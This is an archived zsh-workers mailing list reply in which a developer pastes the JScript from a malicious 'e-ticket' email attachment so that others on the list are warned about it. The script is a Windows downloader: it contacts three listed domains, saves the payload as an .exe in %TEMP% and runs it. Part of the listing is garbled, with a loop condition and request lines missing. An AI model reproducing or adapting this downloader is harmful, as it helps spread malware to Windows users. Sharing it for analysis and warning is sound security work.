zsh-workers
 help / color / mirror / code / Atom feed
From: Markus Trippelsdorf <markus@trippelsdorf.de>
To: Peter Stephenson <p.stephenson@samsung.com>
Cc: Zsh Hackers' List <zsh-workers@zsh.org>
Subject: Re: zsh-workers/37266 has a malicious attachment
Date: Tue, 1 Dec 2015 14:13:27 +0100	[thread overview]
Message-ID: <20151201131327.GB315@x4> (raw)
In-Reply-To: <20151201122412.7d355172@pwslap01u.europe.root.pri>

On 2015.12.01 at 12:24 +0000, Peter Stephenson wrote:
> ...probably obvious enough to everyone here, but as it got flagged up by
> our email system I thought it was worth reporting more widely.
> Subject line is "Your e-ticket #0000228935".

Only Windows users are attacked. Here is the code:

var b = "itechgalaxyapps.com mybeautypedia.com kindernestmumbai.com".split(" ");
var ws = WScript.CreateObject("WScript.Shell");
var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + "750083";
var xo = WScript.CreateObject("MSXML2.XMLHTTP");
var xa = WScript.CreateObject("ADODB.Stream");
var ld = 0;
for (var n = 1; n <= 3; n++) {
    for (var i = ld; i 1000) {
        dn = 1;
        xa.position = 0;
        xa.saveToFile(fn + n + ".exe", 2);
        try {
            ws.Run(fn + n + ".exe", 1, 0);
        } catch (er) {};
    };
    xa.close();
};
if (dn == 1) {
    ld = i;
    break;
};
} catch (er) {};
};
};

-- 
Markus


  reply	other threads:[~2015-12-01 13:20 UTC|newest]

Thread overview: 7+ messages / expand[flat|nested]  mbox.gz  Atom feed  top
2015-12-01 12:24 Peter Stephenson
2015-12-01 13:13 ` Markus Trippelsdorf [this message]
2015-12-01 18:11 ` Bart Schaefer
2015-12-01 20:33   ` ZyX
2015-12-02  0:21     ` Axel Beckert
2015-12-02  0:35       ` Daniel Shahaf
2015-12-03 11:38         ` Vincent Lefevre

Reply instructions:

You may reply publicly to this message via plain-text email
using any one of the following methods:

* Save the following mbox file, import it into your mail client,
  and reply-to-all from there: mbox

  Avoid top-posting and favor interleaved quoting:
  https://en.wikipedia.org/wiki/Posting_style#Interleaved_style

* Reply using the --to, --cc, and --in-reply-to
  switches of git-send-email(1):

  git send-email \
    --in-reply-to=20151201131327.GB315@x4 \
    --to=markus@trippelsdorf.de \
    --cc=p.stephenson@samsung.com \
    --cc=zsh-workers@zsh.org \
    /path/to/YOUR_REPLY

  https://kernel.org/pub/software/scm/git/docs/git-send-email.html

* If your mail client supports setting the In-Reply-To header
  via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line before the message body. 
Code repositories for project(s) associated with this public inbox

	https://git.vuxu.org/mirror/zsh/

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for NNTP newsgroup(s).